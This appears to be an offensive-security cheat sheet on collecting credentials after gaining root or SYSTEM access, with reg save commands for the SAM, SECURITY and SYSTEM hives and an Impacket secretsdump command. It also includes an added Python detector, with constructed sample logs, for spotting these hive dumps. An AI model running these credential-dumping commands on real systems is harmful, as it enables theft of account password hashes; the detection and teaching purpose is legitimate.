Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑


Dump users and passwords

Collect files on target


Then unshadow and crack them.


Dump SAM

Collect files on target

reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system

Then extract the hashes from them using Impacket's secretsdump:

secretsdump.py -sam sam -security security -system system LOCAL
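
On the defending side, the three reg save commands above show up in process-creation logging (Windows Security event 4688 with command-line auditing, or Sysmon event ID 1). The following is an added example, not part of the original notes, that flags hosts where reg.exe saves these hives; the event records, host names and field names are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches reg.exe saving one of the hives named on this page. Accepts the long
# root-key name, optional quotes and any letter case; the lookahead rejects
# subkeys such as hklm\system\CurrentControlSet.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)'
    r'\\(sam|security|system)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed sample process-creation records (field names are assumptions).
EVENTS = [
    {"host": "WS01", "cmd": r"reg save hklm\sam .\sam"},
    {"host": "WS01", "cmd": r"reg save hklm\security .\security"},
    {"host": "WS01", "cmd": r"reg save hklm\system .\system"},
    {"host": "WS02",
     "cmd": r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SYSTEM D:\bak\system.hiv'},
    {"host": "WS03", "cmd": r"reg query hklm\system\CurrentControlSet\Services"},
    {"host": "WS03", "cmd": r"reg save hklm\software .\software"},
]

def saved_hives(events):
    """Return {host: set of sensitive hive names saved with reg.exe}."""
    hits = defaultdict(set)
    for ev in events:
        match = HIVE_SAVE.search(ev["cmd"])
        if match:
            hits[ev["host"]].add(match.group(1).lower())
    return dict(hits)

def triage(events):
    """Rate each host. SAM or SECURITY together with SYSTEM is rated high,
    because SYSTEM holds the boot key needed to decrypt the other two."""
    alerts = {}
    for host, hives in saved_hives(events).items():
        usable = "system" in hives and bool(hives & {"sam", "security"})
        alerts[host] = ("high" if usable else "medium", sorted(hives))
    return alerts

if __name__ == "__main__":
    for host, (severity, hives) in sorted(triage(EVENTS).items()):
        print(f"{host}: {severity} - reg save of {', '.join(hives)}")
```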

Dump NTDS (DC)

By default, the Ntds.dit file is located at %SystemRoot%\NTDS\Ntds.dit on a domain controller.

TODO (see /13-misc/impacket.md)
